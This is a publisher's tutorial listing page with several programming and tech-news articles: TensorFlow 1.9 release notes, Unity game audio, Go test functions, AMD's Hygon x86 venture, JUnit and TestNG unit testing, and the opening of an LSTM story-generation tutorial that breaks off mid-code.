Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Save more on your purchases! discount-offer-chevron-icon
Savings automatically calculated. No voucher code required.
Arrow left icon
Explore Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Newsletter Hub
Free Learning
Arrow right icon
timer SALE ENDS IN
0 Days
:
00 Hours
:
00 Minutes
:
00 Seconds

How-To Tutorials

7008 Articles
article-image-tensorflow-1-9-is-now-generally-available
Savia Lobo
11 Jul 2018
3 min read
Save for later

Tensorflow 1.9 is now generally available

Savia Lobo
11 Jul 2018
3 min read
After the back-to-back release of Tensorflow 1.9 release candidates, rc-0, rc-1, and rc-2, the final version TensorFlow 1.9 is out and generally available. Key highlights of this version include support for gradient boosted trees estimators, new keras layers to speed up GRU and LSTM implementations and tfe.Network deprecation. It also includes improved functions for supporting data loading, text processing and pre-made estimators. Tensorflow 1.9 major features and improvements As mentioned in Tensorflow 1.9 rc-2, new Keras-based get started page and programmers guide page in the tf.Keras have been updated. The tf.Keras has been updated to Keras 2.1.6 API. One should try the newly added  tf.keras.layers.CuDNNGRU, used for a faster GRU implementation and tf.keras.layers.CuDNNLSTM layers, which allows faster LSTM implementation. Both these layers are backed by cuDNN( NVIDIA CUDA Deep Neural Network library (cuDNN)). Gradient boosted trees estimators, a non-parametric statistical learning technique for  classification and regression, are now supported by core feature columns and losses. Also, the python interface for the TFLite Optimizing Converter has been expanded, and the command line interface (AKA: toco, tflite_convert) is once again included in the standard pip installation. The distributions.Bijector API in the TF version 1.9 also supports broadcasting for Bijectors with the new API changes. Tensorflow 1.9 also includes improved data-loading and text processing with tf.decode_compressed, tf.string_strip, and Tf.strings.regex_full_match. It also has an added experimental support for new pre-made estimators like tf.contrib.estimator.BaselineEstimator, tf.contrib.estimator.RNNClassifier, tf.contrib.estimator.RNNEstimator. This version includes two breaking changes. Firstly for opening up empty variable scopes one can replace variable_scope('', ...) by variable_scope(tf.get_variable_scope(), ...), which is used to get the current scope of the variable. And the second breakthrough change is, headers used for building custom ops have been moved to a different file path. From site-packages/external to site-packages/tensorflow/include/external. Some bug fixes and other changes include: The tfe.Network has been deprecated Layered variable names have changed in the following conditions: Using tf.keras.layers with custom variable scopes. Using tf.layers in a subclassed tf.keras.Model class. Added the ability to pause recording operations for gradient computation via tf.GradientTape.stop_recording in the Eager execution and updated its documentation and introductory notebooks. Fixed an issue in which the TensorBoard Debugger Plugin, which could not handle total source file size exceeding gRPC message size limit (4 MB). Added GCS Configuration Ops and complex128 support to FFT, FFT2D, FFT3D, IFFT, IFFT2D, and IFFT3D. Conv3D, Conv3DBackpropInput, Conv3DBackpropFilter now supports arbitrary. Prevents tf.gradients() from backpropagating through integer tensors. LinearOperator[1D,2D,3D]Circulant added to tensorflow.linalg. To know more about the other changes, visit TensorFlow 1.9 release notes on GitHub. Create a TensorFlow LSTM that writes stories [Tutorial] Build and train an RNN chatbot using TensorFlow [Tutorial] Use TensorFlow and NLP to detect duplicate Quora questions [Tutorial]
Read more
  • 0
  • 0
  • 5930

article-image-implementing-unity-2017-game-audio-tutorial
Amarabha Banerjee
11 Jul 2018
11 min read
Save for later

Implementing Unity 2017 Game Audio [Tutorial]

Amarabha Banerjee
11 Jul 2018
11 min read
Background music and audio effects play a big role in determining any game's success or failure. Creating engaging game audio, importing audio from other sources and working and customizing Audio FX clips as per the game flow is a vital task for any game developer.  In this article, we are going to discuss about how to create, customize and use third party audio in Unity games. This article is a part of the book titled "Unity 2017 2D Game Development Projects" written by Lauren S. Ferro & Francesco Sapio. Basics of audio and sound FX in Unity Adding sound in Unity is simple enough, but you can implement it better if you understand how sound travels. While this is extremely important in 3D games because of the added third dimension, it is quite important in 2D games, just in a slightly different way. Before we discuss the differences, let's first learn about what and how sound works from a quick physics lesson. Listening to the physics behind sound What we hear is not just music, sound effects (FX) and ambient background noise. The sound is a longitudinal, mechanical (vibrating) wave. These "waves" can pass through different mediums (for example, air, water, your desk) but not through a vacuum. Therefore, no one will hear your screams in space. The sound is a variation in pressure. A region of increased pressure on a sound wave is called a compression (or condensation). A region of decreased pressure on a sound wave is called a rarefaction (or dilation). You can see this concept illustrated in the following image: The density of certain materials, such as glass and plastic, allows a certain amount of light to pass through them. This will influence how the light will behave when it passes through them, such as bending/refracting (that is, the index of refraction), various materials (for example, liquids, solids, gases) have the same effect when it comes to allowing sound waves to pass. Some materials allow the sound to pass easily, while others dampen it. Therefore, sound studios/booths are made of certain materials to remove things such as echoes. It has a similar effect to when you scream underwater that there is a shark. It won't be as loud as if you scream from your kitchen to tell everyone dinner is ready. Another thing to consider is what is known as the Doppler Effect. The Doppler Effect results from an increase (or decrease) in the frequency of sound (and other things such as light, ripples in water) as the source of the sound and person/player move toward (or away from) each other. A simple example of this is when an emergency vehicle passes by you. You will notice that the sound of the siren is different before it reaches you when it is near you, and once it passes you. Considering this example, it is because there is a sudden change in pitch in the passing siren. This is visualized in the following image: So, what is the point of knowing this when it comes to developing games? Well, this is particularly important when creating games, more so in 3D, in relation to how sounds are heard by players in many ways. For example, imagine that you're nearing a creek, but there are dense bushes, large pine trees, and a rugged terrain. The sound that creek makes from where a player is in the game world is going to sound very different if it was a completely flat plane free from any vegetation. When it comes to 2D games, this is not necessarily as important because we are working without depth (z-axis) but similar principles apply when players may be navigating around a top-down environment and they are near a point of interest. You don't want that sound to be as loud when the player is far away as it would be if they were up close. Within the context of 2D and 3D sounds, Unity has a parameter for this exact thing called Spatial Blend. We will discuss this more in the Audio Source section. There are several ways that you can create audio within Unity, from importing your own/downloaded sounds to recording it live. Like images, Unity can import most standard audio file formats: AIFF, WAV, MP3, and Ogg, and tracker modules (for example, short instrument samples): .xm, .mod, .it, and .s3m. Importing audio Importing audio into Unity follows the same processes as importing any other type of asset. We will cover the basics of what you need to know in the following sections. Audio Listener Have you heard the saying, If a tree falls in a forest and no one is there to hear it, does it still make a sound? Well, in Unity, if there is nothing to hear your audio, then the answer is no. This is because Unity has a component called an Audio Listener, which works like a microphone. To locate the Audio Listener, click the Main Camera, and then look over at the Inspector; it should be located near the bottom, like in the following image: If for some reason, it isn't there, you can always add it by clicking the following button titled Add Component, type Audio Listener, and select it (click it) from the list, like in the following image: The important thing to remember is that an Audio Listener is the location of the sound, so it makes sense as to why it is typically placed on the Main Camera, but it can also be placed on a Player. A single scene can only have one Audio Listener; therefore, it's best to experiment with the one that works best for your game. It is important to remember that an Audio Listener works with an Audio Source, and must have one to work. Audio Source The Audio Source is where the sound comes from. This can be from many different objects within a Scene as well as background and sound FX. The Audio Source has several parameters; later we will briefly discuss the main ones. To see more information about all the parameters, you can check out the official Unity documentation by visiting the link or scanning the QR code: https://docs.unity3d.com/2017.2/Documentation/Manual/class-AudioSource.html You may be wondering why we should have a slider for Spatial Blend, instead of a checkbox. This is because we need to fade between 2D and 3D, and there is a good reason for this. Imagine that you're in a game and you're looking at a screen on a computer. In this case, your camera is going to be fixated on whatever is on the screen. This could be checking an inventory or even entering nuclear codes. In any case, you will want the sound that is being emitted from the screen to be the focal audio. Therefore, the slider in the Spatial Blend parameter is going to be closer to 2D. This is because you may still want ambient noises that are in the background incorporated into the experience. So, if you are closer to 2D, the sound will be the same in both speakers (or headphones). The closer you slide toward 3D, the more the volume will depend on the proximity of the Sound Listener to the Sound Source. It will also allow for things, such as the Doppler Effect, to be more noticeable, as it takes in 3D space. There are also specific settings for these things. Choosing sounds for background and FX When it comes to picking the right kind of music for your game, just like the aesthetics, you need to think about what kind of "mood" you're trying to create. Is it a somber or uplifting kind of mood, are you ironically contrasting the graphics (for example, happy) with gloomy music? There is really no right or wrong when it comes to your musical selection if you can communicate to the player what they are supposed to feel, at least in general. For this game, I have provided you with some example "moods" that you can apply to this game. Of course, you're welcome to choose sounds other than this that are more to your liking! All the sounds that we will use will be from the Free Sound website: https://freesound.org. You will need to create an account to download them, but it's free and there are many great sounds that you can use when creating games. In saying this, if you're intending to create your games for commercial purposes, please make sure that you check the Terms and Conditions on Free Sound to make sure that you're not violating any of them. Each track will have its own attribution licenses, including those for commercial use, so always check! For this project, we're going to stick with the "Happy" version. But I encourage you to experiment! Happy Collecting Angel Cakes: Chime sound (https://freesound.org/people/jgreer/sounds/333629/) Being attacked by the enemy: Cat Purr/Twit4.wav (https://freesound.org/people/steffcaffrey/sounds/262309/) Collecting health: correct (https://freesound.org/people/ertfelda/sounds/243701/) Collecting bonuses: Signal-Ring 1 (https://freesound.org/people/Vendarro/sounds/399315/) Background: Kirmes_Orgel_004_2_Rosamunde.mp3 (https://freesound.org/people/bilwiss/sounds/24720/) Sad Collecting Angel Cakes: Glass Tap (https://freesound.org/people/Unicornaphobist/sounds/262958/) Being attacked by the enemy: musicbox1.wav (https://freesound.org/people/sandocho/sounds/17700/) Collecting health: chime.wav (https://freesound.org/people/Psykoosiossi/sounds/398661/) Collecting bonuses: short metallic hit (https://freesound.org/people/waveplay/sounds/366400/) Background: improvised chill 8 (https://freesound.org/people/waveplay/sounds/238529/) Retro Collecting Angel Cakes: TF_Buzz.flac (https://freesound.org/people/copyc4t/sounds/235652/) Being attacked by the enemy: Game Die (https://freesound.org/people/josepharaoh99/sounds/364929/) Collecting health: galanghee.wav (https://freesound.org/people/metamorphmuses/sounds/91387/) Collecting bonuses: SW05.WAV (https://freesound.org/people/mad-monkey/sounds/66684/) Background: Angel-techno pop music loop (https://freesound.org/people/frankum/sounds/387410/) Not everyone can hear well or at all, so it pays to keep this in mind when you're developing games that may rely on audio to provide feedback to players. While subtitles can enable dialogue to be more accessible, sound FX can be a little trickier. Therefore, when it comes to implementing audio, think about how you could complement it, even if the same effect that you're trying to achieve with sound is subtle. For example, if you play a "bleep" for every item collected, perhaps you could associate it with a slight glow or flash of color. The choice is up to you, but it's something to keep in mind. On the other end of the spectrum, those who can hear might also want to turn the sounds off. We've all played that game (or several) that really begins to become irritating, so make sure that you also check this while you're playtesting. You don't want an awesome game to suck because your audio is intolerable and there is not an option to TURN THE SOUND OFF! You’ve been warned. Integrating background music in our game Once you choose which music better suits the kind of feel you want to create for your game, import both the sound and the music inside the project. If you want, you can create two folders for them, SoundFX and Music, respectively. Now, in our scene, we need to do the following: Create an empty game object (by clicking GameObject | Create empty), rename it Background Music. Attach an Audio Source component (in the Inspector, click Add Component | Audio | Audio Source). Next, we need to drag and drop the music we decided on/downloaded into the AudioClip variable and check the Loop option, so the background music will never stop. Also, check that Play on Awake is checked as well, even if it should be by default, so the music will start playing as soon as the game starts. Hit Play to start the game. Lastly, adjust the volume, depending on the music you chose. This may require a bit of playtesting (remember to set the value after the play mode, because the settings you adjust during play mode are not kept). In the end, this is how the component should look (in the image, I chose the happy theme music, and set a Volume of 0.1): Here in this article we have shown you how to incorporate game audio effects and background music in Unity games. If you liked this article, then check out the complete book Unity 2017 2D Game Development Projects. AI for Unity game developers: How to emulate real-world senses in your NPC agent Working with Unity Variables to script powerful Unity 2017 games How to use arrays, lists, and dictionaries in Unity for 3D game development
Read more
  • 0
  • 0
  • 30909

article-image-writing-perform-test-functions-in-golang-tutorial
Natasha Mathur
10 Jul 2018
9 min read
Save for later

Writing test functions in Golang [Tutorial]

Natasha Mathur
10 Jul 2018
9 min read
Go is a modern programming language built for the 21st-century application development. Hardware and technology have advanced significantly over the past decade, and most of the other languages do not take advantage of these technological advancements.  Go allows us to build network applications that take advantage of concurrency and parallelism made available with multicore systems. Testing is an important part of programming, whether it is in Go or in any other language. Go has a straightforward approach to writing tests, and in this tutorial, we will look at some important tools to help with testing. This tutorial is an excerpt from the book ‘Distributed computing with Go’, written by V.N. Nikhil Anurag. There are certain rules and conventions we need to follow to test our code. They are as follows: Source files and associated test files are placed in the same package/folder The name of the test file for any given source file is <source-file-name>_test.go Test functions need to have the "Test" prefix, and the next character in the function name should be capitalized In the remainder of this tutorial, we will look at three files and their associated tests: variadic.go and variadic_test.go addInt.go and addInt_test.go nil_test.go (there isn't any source file for these tests) Along the way, we will introduce any concepts we might use. variadic.go function In order to understand the first set of tests, we need to understand what a variadic function is and how Go handles it. Let's start with the definition: Variadic function is a function that can accept any number of arguments during function call. Given that Go is a statically typed language, the only limitation imposed by the type system on a variadic function is that the indefinite number of arguments passed to it should be of the same data type. However, this does not limit us from passing other variable types. The arguments are received by the function as a slice of elements if arguments are passed, else nil, when none are passed. Let's look at the code to get a better idea: // variadic.go package main func simpleVariadicToSlice(numbers ...int) []int { return numbers } func mixedVariadicToSlice(name string, numbers ...int) (string, []int) { return name, numbers } // Does not work. // func badVariadic(name ...string, numbers ...int) {} We use the ... prefix before the data type to define a function as a variadic function. Note that we can have only one variadic parameter per function and it has to be the last parameter. We can see this error if we uncomment the line for badVariadic and try to test the code. variadic_test.go We would like to test the two valid functions, simpleVariadicToSlice, and mixedVariadicToSlice, for various rules defined above. However, for the sake of brevity, we will test these: simpleVariadicToSlice: This is for no arguments, three arguments, and also to look at how to pass a slice to a variadic function mixedVariadicToSlice: This is to accept a simple argument and a variadic argument Let's now look at the code to test these two functions: // variadic_test.go package main import "testing" func TestSimpleVariadicToSlice(t *testing.T) { // Test for no arguments if val := simpleVariadicToSlice(); val != nil { t.Error("value should be nil", nil) } else { t.Log("simpleVariadicToSlice() -> nil") } // Test for random set of values vals := simpleVariadicToSlice(1, 2, 3) expected := []int{1, 2, 3} isErr := false for i := 0; i < 3; i++ { if vals[i] != expected[i] { isErr = true break } } if isErr { t.Error("value should be []int{1, 2, 3}", vals) } else { t.Log("simpleVariadicToSlice(1, 2, 3) -> []int{1, 2, 3}") } // Test for a slice vals = simpleVariadicToSlice(expected...) isErr = false for i := 0; i < 3; i++ { if vals[i] != expected[i] { isErr = true break } } if isErr { t.Error("value should be []int{1, 2, 3}", vals) } else { t.Log("simpleVariadicToSlice([]int{1, 2, 3}...) -> []int{1, 2, 3}") } } func TestMixedVariadicToSlice(t *testing.T) { // Test for simple argument & no variadic arguments name, numbers := mixedVariadicToSlice("Bob") if name == "Bob" && numbers == nil { t.Log("Recieved as expected: Bob, <nil slice>") } else { t.Errorf("Received unexpected values: %s, %s", name, numbers) } } Running tests in variadic_test.go Let's run these tests and see the output. We'll use the -v flag while running the tests to see the output of each individual test: $ go test -v ./{variadic_test.go,variadic.go} === RUN TestSimpleVariadicToSlice --- PASS: TestSimpleVariadicToSlice (0.00s) variadic_test.go:10: simpleVariadicToSlice() -> nil variadic_test.go:26: simpleVariadicToSlice(1, 2, 3) -> []int{1, 2, 3} variadic_test.go:41: simpleVariadicToSlice([]int{1, 2, 3}...) -> []int{1, 2, 3} === RUN TestMixedVariadicToSlice --- PASS: TestMixedVariadicToSlice (0.00s) variadic_test.go:49: Received as expected: Bob, <nil slice> PASS ok command-line-arguments 0.001s addInt.go The tests in variadic_test.go elaborated on the rules for the variadic function. However, you might have noticed that TestSimpleVariadicToSlice ran three tests in its function body, but go test treats it as a single test. Go provides a good way to run multiple tests within a single function, and we shall look them in addInt_test.go. For this example, we will use a very simple function as shown in this code: // addInt.go package main func addInt(numbers ...int) int { sum := 0 for _, num := range numbers { sum += num } return sum } addInt_test.go You might have also noticed in TestSimpleVariadicToSlice that we duplicated a lot of logic, while the only varying factor was the input and expected values. One style of testing, known as Table-driven development, defines a table of all the required data to run a test, iterates over the "rows" of the table and runs tests against them. Let's look at the tests we will be testing against no arguments and variadic arguments: // addInt_test.go package main import ( "testing" ) func TestAddInt(t *testing.T) { testCases := []struct { Name string Values []int Expected int }{ {"addInt() -> 0", []int{}, 0}, {"addInt([]int{10, 20, 100}) -> 130", []int{10, 20, 100}, 130}, } for _, tc := range testCases { t.Run(tc.Name, func(t *testing.T) { sum := addInt(tc.Values...) if sum != tc.Expected { t.Errorf("%d != %d", sum, tc.Expected) } else { t.Logf("%d == %d", sum, tc.Expected) } }) } } Running tests in addInt_test.go Let's now run the tests in this file, and we are expecting each of the row in the testCases table, which we ran, to be treated as a separate test: $ go test -v ./{addInt.go,addInt_test.go} === RUN TestAddInt === RUN TestAddInt/addInt()_->_0 === RUN TestAddInt/addInt([]int{10,_20,_100})_->_130 --- PASS: TestAddInt (0.00s) --- PASS: TestAddInt/addInt()_->_0 (0.00s) addInt_test.go:23: 0 == 0 --- PASS: TestAddInt/addInt([]int{10,_20,_100})_->_130 (0.00s) addInt_test.go:23: 130 == 130 PASS ok command-line-arguments 0.001s nil_test.go We can also create tests that are not specific to any particular source file; the only criteria is that the filename needs to have the <text>_test.go form. The tests in nil_test.go elucidate on some useful features of the language which the developer might find useful while writing tests. They are as follows: httptest.NewServer: Imagine the case where we have to test our code against a server that sends back some data. Starting and coordinating a full blown server to access some data is hard. The http.NewServer solves this issue for us. t.Helper: If we use the same logic to pass or fail a lot of testCases, it would make sense to segregate this logic into a separate function. However, this would skew the test run call stack. We can see this by commenting t.Helper() in the tests and rerunning go test. We can also format our command-line output to print pretty results. We will show a simple example of adding a tick mark for passed cases and cross mark for failed cases. In the test, we will run a test server, make GET requests on it, and then test the expected output versus actual output: // nil_test.go package main import ( "fmt" "io/ioutil" "net/http" "net/http/httptest" "testing" ) const passMark = "u2713" const failMark = "u2717" func assertResponseEqual(t *testing.T, expected string, actual string) { t.Helper() // comment this line to see tests fail due to 'if expected != actual' if expected != actual { t.Errorf("%s != %s %s", expected, actual, failMark) } else { t.Logf("%s == %s %s", expected, actual, passMark) } } func TestServer(t *testing.T) { testServer := httptest.NewServer( http.HandlerFunc( func(w http.ResponseWriter, r *http.Request) { path := r.RequestURI if path == "/1" { w.Write([]byte("Got 1.")) } else { w.Write([]byte("Got None.")) } })) defer testServer.Close() for _, testCase := range []struct { Name string Path string Expected string }{ {"Request correct URL", "/1", "Got 1."}, {"Request incorrect URL", "/12345", "Got None."}, } { t.Run(testCase.Name, func(t *testing.T) { res, err := http.Get(testServer.URL + testCase.Path) if err != nil { t.Fatal(err) } actual, err := ioutil.ReadAll(res.Body) res.Body.Close() if err != nil { t.Fatal(err) } assertResponseEqual(t, testCase.Expected, fmt.Sprintf("%s", actual)) }) } t.Run("Fail for no reason", func(t *testing.T) { assertResponseEqual(t, "+", "-") }) } Running tests in nil_test.go We run three tests, where two test cases will pass and one will fail. This way we can see the tick mark and cross mark in action: $ go test -v ./nil_test.go === RUN TestServer === RUN TestServer/Request_correct_URL === RUN TestServer/Request_incorrect_URL === RUN TestServer/Fail_for_no_reason --- FAIL: TestServer (0.00s) --- PASS: TestServer/Request_correct_URL (0.00s) nil_test.go:55: Got 1. == Got 1. --- PASS: TestServer/Request_incorrect_URL (0.00s) nil_test.go:55: Got None. == Got None. --- FAIL: TestServer/Fail_for_no_reason (0.00s) nil_test.go:59: + != - FAIL exit status 1 FAIL command-line-arguments 0.003s We looked at how to write test functions in Go, and learned a few interesting concepts when dealing with a variadic function and other useful test functions. If you found this post useful, do check out the book  'Distributed Computing with Go' to learn more about testing, Goroutines, RESTful web services, and other concepts in Go. Why is Go the go-to language for cloud-native development? – An interview with Mina Andrawos Systems programming with Go in UNIX and Linux How to build a basic server-side chatbot using Go
Read more
  • 0
  • 0
  • 32940

article-image-amds-293-million-jv-with-chinese-chipmaker-hygon-starts-production-of-x86-cpus
Natasha Mathur
10 Jul 2018
3 min read
Save for later

AMD’s $293 million JV with Chinese chipmaker Hygon starts production of x86 CPUs

Natasha Mathur
10 Jul 2018
3 min read
Chinese chip producer Hygon begins production of China-made x86 processors named “Dhyana”. These processors use AMD’s Zen microarchitecture and are the result of the licensing deal between AMD and its Chinese partners. Hygon has started shipping the new “Dhyana” x86 CPUs. According to the official statements made by AMD, it does not permit the selling of the final chip designs to its partners in China instead it encourages their partners to design their own processors that suit the needs of the Chinese server market. This is an effort to break China’s dependency on the foreign technology market. In 2016, AMD announced that it is working on a joint project in China to develop processors. This provided AMD with a $293 million in cash by Tianjin Haiguang Advanced Technology Investment Co. (THATIC). THATIC includes AMD as well as the Chinese Academy of Sciences. What’s interesting is that AMD managed to establish a license allowing Chinese processor manufacturers to develop and sell x86 processors despite the fact that Intel was blocked from selling Xeon processors to China in 2015 by the Obama administration. This happened over concerns that the chips would help China’s nuclear weapon programs. Dhyana processors are focusing on embedded applications currently. It is a System on chip ( SoC) instead of a socketed chip. But this design doesn’t limit the Dhyana processors from being used in high-performance or data center applications, which usually leverages Intel Xeon and other server processors. Also, Linux kernels developers have stated that the x86 processors are very close in design to that of AMD’s EPYC. In fact, when moving the Linux kernel code for EPYC processors to the Hygon chips, it required fewer than 200 new lines of code, according to a report from Michael Larabel of Phoronix. The only difference between the two is the vendor IDs and family series. Apart from AMD, there are other chip-producing ventures that China is heavily engrossed in. One such venture is Zhaoxin Semiconductor that is working to manufacture x86 chips through a partnership with VIA. China is making continuous efforts to free the country from US interventions and to change their long-term processor market. There are implications that most of the x86 processors are 14nm chips, but there isn’t much information available on the capabilities of the Dhyana family. Also, other details of their manufacturing characteristics are still to be known. Baidu releases Kunlun AI chip, China’s first cloud-to-edge AI chip Qualcomm announces a new chipset for standalone AR/VR headsets at Augmented World Expo
Read more
  • 0
  • 0
  • 22977

article-image-unit-testing-with-java-frameworks-junit-and-testng-tutorial
Fatema Patrawala
10 Jul 2018
10 min read
Save for later

Unit testing with Java frameworks: JUnit and TestNG [Tutorial]

Fatema Patrawala
10 Jul 2018
10 min read
Frequent manual testing is too impractical for any but the smallest systems. The only way around this is the use of automated tests. Automated tests are an effective method to reduce the time and cost of building, deploying, and maintaining applications. In order to effectively manage applications, it is of the utmost importance that both the implementation and test codes are as simple as possible. In this tutorial, we will look at implementing simple and easy to learn Java Unit testing frameworks for writing and running test i.e. JUnit and TestNG. You are reading Java unit testing tutorial from the book Test Driven Java Development - Second Edition, written by Alex Garcia and Viktor Farcic. Simplicity of code is one of the core extreme programming (XP) values and the key to Test Driven Development (TDD) and programming in general. It is most often accomplished through division into small units. In Java, units are methods. Being the smallest, the feedback loop they provide is the fastest so we spend most of our time thinking about and working on them. As a counterpart to implementation methods, unit tests should constitute by far the biggest percentage of all tests. So let us look at what is Unit testing and then get into the usage of the frameworks. What is Unit testing? Unit testing is a practice that forces us to test small, individual, and isolated units of code. They are usually methods, even though in some cases classes or even whole applications can be considered to be units, as well. In order to write unit tests, code under tests needs to be isolated from the rest of the application. Preferably, that isolation is already ingrained in the code or it can be accomplished with the use of mocks. If unit tests of a particular method cross the boundaries of that unit, then they become integration tests. As such, it becomes less clear what is under the tests. In case of a failure, the scope of a problem suddenly increases and finding the cause becomes more tedious. Java Unit testing frameworks In this section, two of the most used Java frameworks for unit testing are shown and briefly commented on. We will focus on their syntax and main features by comparing a test class written using both JUnit and TestNG. Although there are slight differences, both frameworks offer the most commonly used functionalities, and the main difference is how tests are executed and organized. Let's start with a question. What is a test? How can we define it? A test is a repeatable process or method that verifies the correct behavior of a tested target in a determined situation with a determined input expecting a predefined output or interactions. In the programming approach, there are several types of tests depending on their scope—functional tests, acceptance tests, and unit tests. Further on, we will explore each of those types of tests in more detail. Let's see how to test a single Java class. The class is quite simple, but enough for our interest: public class Friendships { private final Map<String, List<String>> friendships = new HashMap<>(); public void makeFriends(String person1, String person2) { addFriend(person1, person2); addFriend(person2, person1); } public List<String> getFriendsList(String person) { if (!friendships.containsKey(person)) { return Collections.emptyList(); } return friendships.get(person) } public boolean areFriends(String person1, String person2) { return friendships.containsKey(person1) && friendships.get(person1).contains(person2); } private void addFriend(String person, String friend) { if (!friendships.containsKey(person)) { friendships.put(person, new ArrayList<String>()); } List<String> friends = friendships.get(person); if (!friends.contains(friend)) { friends.add(friend); } } } Testing with JUnit JUnit is a simple and easy-to-learn framework for writing and running tests. Each test is mapped as a method, and each method should represent a specific known scenario in which a part of our code will be executed. The code verification is made by comparing the expected output or behavior with the actual output. The following is the test class written with JUnit. There are some scenarios missing, but for now we are interested in showing what tests look like. We will focus on better ways to test our code and on best practices later in this book. Test classes usually consist of three stages: set up, test, and tear down. Let's start with methods that set up data needed for tests. A setup can be performed on a class or method level: Friendships friendships; @BeforeClass public static void beforeClass() { // This method will be executed once on initialization time } @Before public void before() { friendships = new Friendships(); friendships.makeFriends("Joe",",," "Audrey"); friendships.makeFriends("Joe", "Peter"); friendships.makeFriends("Joe", "Michael"); friendships.makeFriends("Joe", "Britney"); friendships.makeFriends("Joe", "Paul"); } The @BeforeClass annotation specifies a method that will be run once before any of the test methods in the class. It is a useful way to do some general set up that will be used by most (if not all) tests. The @Before annotation specifies a method that will be run before each test method. We can use it to set up test data without worrying that the tests that are run afterwards will change the state of that data. In the preceding example, we're instantiating the Friendships class and adding five sample entries to the Friendships list. No matter what changes will be performed by each individual test, this data will be recreated over and over until all the tests are performed. Common examples of usage of those two annotations are the setting up of database data, the creation of files needed for tests, and so on. Later on, we'll see how external dependencies can and should be avoided using mocks. Nevertheless, functional or integration tests might still need those dependencies and the @Before and @BeforeClass annotations are a good way to set them up. Once the data is set up, we can proceed with the actual tests: @Test public void alexDoesNotHaveFriends() { Assert.assertTrue("Alex does not have friends", friendships.getFriendsList("Alex").isEmpty()); } @Test public void joeHas5Friends() { Assert.assertEquals("Joe has 5 friends", 5, friendships.getFriendsList("Joe").size()); } @Test public void joeIsFriendWithEveryone() { List<String> friendsOfJoe = Arrays.asList("Audrey", "Peter", "Michael", "Britney", "Paul"); Assert.assertTrue(friendships.getFriendsList("Joe") .containsAll(friendsOfJoe)); } In this example, we are using a few of the many different types of asserts. We're confirming that Alex does not have any friends, while Joe is a very popular guy with five friends (Audrey, Peter, Michael, Britney, and Paul). Finally, once the tests are finished, we might need to perform some cleanup: @AfterClass public static void afterClass() { // This method will be executed once when all test are executed } @After public void after() { // This method will be executed once after each test execution } In our example, in the Friendships class, we have no need to clean up anything. If there were such a need, those two annotations would provide that feature. They work in a similar fashion to the @Before and @BeforeClass annotations. @AfterClass is run once all tests are finished. The @After annotation is executed after each test. This runs each test method as a separate class instance. As long as we are avoiding global variables and external resources, such as databases and APIs, each test is isolated from the others. Whatever was done in one, does not affect the rest. The complete source code can be found in the FriendshipsTest class at https://bitbucket.org/vfarcic/tdd-java-ch02-example-junit. Testing with TestNG In TestNG, tests are organized in classes, just as in the case of JUnit. The following Gradle configuration (build.gradle) is required in order to run TestNG tests: dependencies { testCompile group: 'org.testng', name: 'testng', version: '6.8.21' } test.useTestNG() { // Optionally you can filter which tests are executed using // exclude/include filters // excludeGroups 'complex' } Unlike JUnit, TestNG requires additional Gradle configuration that tells it to use TestNG to run tests. The following test class is written with TestNG and is a reflection of what we did earlier with JUnit. Repeated imports and other boring parts are omitted with the intention of focusing on the relevant parts: @BeforeClass public static void beforeClass() { // This method will be executed once on initialization time } @BeforeMethod public void before() { friendships = new Friendships(); friendships.makeFriends("Joe", "Audrey"); friendships.makeFriends("Joe", "Peter"); friendships.makeFriends("Joe", "Michael"); friendships.makeFriends("Joe", "Britney"); friendships.makeFriends("Joe", "Paul"); } You probably already noticed the similarities between JUnit and TestNG. Both are using annotations to specify what the purposes of certain methods are. Besides different names (@Beforeclass versus @BeforeMethod), there is no difference between the two. However, unlike Junit, TestNG reuses the same test class instance for all test methods. This means that the test methods are not isolated by default, so more care is needed in the before and after methods. Asserts are very similar as well: public void alexDoesNotHaveFriends() { Assert.assertTrue(friendships.getFriendsList("Alex").isEmpty(), "Alex does not have friends"); } public void joeHas5Friends() { Assert.assertEquals(friendships.getFriendsList("Joe").size(), 5, "Joe has 5 friends"); } public void joeIsFriendWithEveryone() { List<String> friendsOfJoe = Arrays.asList("Audrey", "Peter", "Michael", "Britney", "Paul"); Assert.assertTrue(friendships.getFriendsList("Joe") .containsAll(friendsOfJoe)); } The only notable difference when compared with JUnit is the order of the assert variables. While the JUnit assert's order of arguments is optional message, expected values, and actual values, TestNG's order is an actual value, expected value, and optional message. Besides the difference in the order of arguments we're passing to the assert methods, there are almost no differences between JUnit and TestNG. You might have noticed that @Test is missing. TestNG allows us to set it on the class level and thus convert all public methods into tests. The @After annotations are also very similar. The only notable difference is the TestNG @AfterMethod annotation that acts in the same way as the JUnit @After annotation. As you can see, the syntax is pretty similar. Tests are organized in to classes and test verifications are made using assertions. That is not to say that there are no more important differences between those two frameworks; we'll see some of them throughout this book. I invite you to explore JUnit and TestNG by yourself. The complete source code with the preceding examples are here. The assertions we have written until now have used only the testing frameworks. However, there are some test utilities that can help us make them nicer and more readable. To summarize, we learned about JUnit and Test NG; the Java unit testing frameworks. We also ran tests on both the frameworks to know the usage and difference between the two. To learn concepts of test-driven development in Java to help you build clean, maintainable and robust code, check out this book Test Driven Java Development - Second Edition. Unit Testing Apps with Android Studio Unit Testing in .NET Core with Visual Studio 2017 for better code quality
Read more
  • 0
  • 0
  • 18814

article-image-tensorflow-lstm-that-writes-stories-tutorial
Packt Editorial Staff
09 Jul 2018
18 min read
Save for later

Create a TensorFlow LSTM that writes stories [Tutorial]

Packt Editorial Staff
09 Jul 2018
18 min read
LSTMs are heavily employed for tasks such as text generation and image caption generation. For example, language modeling is very useful for text summarization tasks or generating captivating textual advertisements for products, where image caption generation or image annotation is very useful for image retrieval, and where a user might need to retrieve images representing some concept (for example, a cat). In this tutorial, we will implement an LSTM which will generate new stories after training on a dataset of folk stories. This article is extracted from the book Natural Language Processing with Tensorflow by Thushan Ganegedara. The application that we will cover in this article is the use of an LSTM to generate new text. For this task, we will download translations of some folk stories by the Brothers Grimm. We will use these stories to train an LSTM and ask it at the end to output a fresh new story. We will process the text by breaking it into character level bigrams (n-grams, where n=2) and make a vocabulary out of the unique bigrams. The code for this article is available on Github. First, we will discuss the data we will use for text generation and various preprocessing steps employed to clean data. About the dataset We will understand what the dataset looks like so that when we see the generated text, we can assess whether it makes sense, given the training data. We will download the first 100 books from the website, https://www.cs.cmu.edu/~spok/grimmtmp/. These are translations of a set of books (from German to English) by the Brothers Grimm. Initially, we will download the first 100 books in the website, with an automated script, as shown here: url = 